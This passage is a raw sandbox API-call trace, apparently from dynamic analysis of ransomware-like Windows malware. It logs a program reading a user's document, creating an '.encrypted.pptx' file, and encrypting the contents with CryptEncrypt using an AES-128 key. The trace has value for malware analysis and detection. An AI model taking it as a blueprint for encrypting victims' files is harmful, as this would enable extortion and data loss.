lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0033.041] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0033.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h3wz1pxdd.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.043] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.043] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0033.043] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.043] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.044] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.044] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x70c8, lpOverlapped=0x0) returned 1 [0033.046] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.046] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70c8) returned 0x945010 [0033.046] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.047] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.047] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.055] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.056] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.056] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.056] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.056] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.056] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.057] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.057] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.057] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.057] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.057] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.058] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0033.058] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.058] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.059] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.059] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.059] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.059] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.059] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.059] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.060] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.060] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x70c8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x70d0) returned 1 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0033.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.060] CharLowerBuffW (in: lpsz="byte[28881]", cchLength=0xb | out: lpsz="byte[28881]") returned 0xb [0033.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.061] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.061] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95a280*, pdwDataLen=0x6ae220*=0x70c8, dwBufLen=0x70d0 | out: pbData=0x95a280*, pdwDataLen=0x6ae220*=0x70d0) returned 1 [0033.061] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, 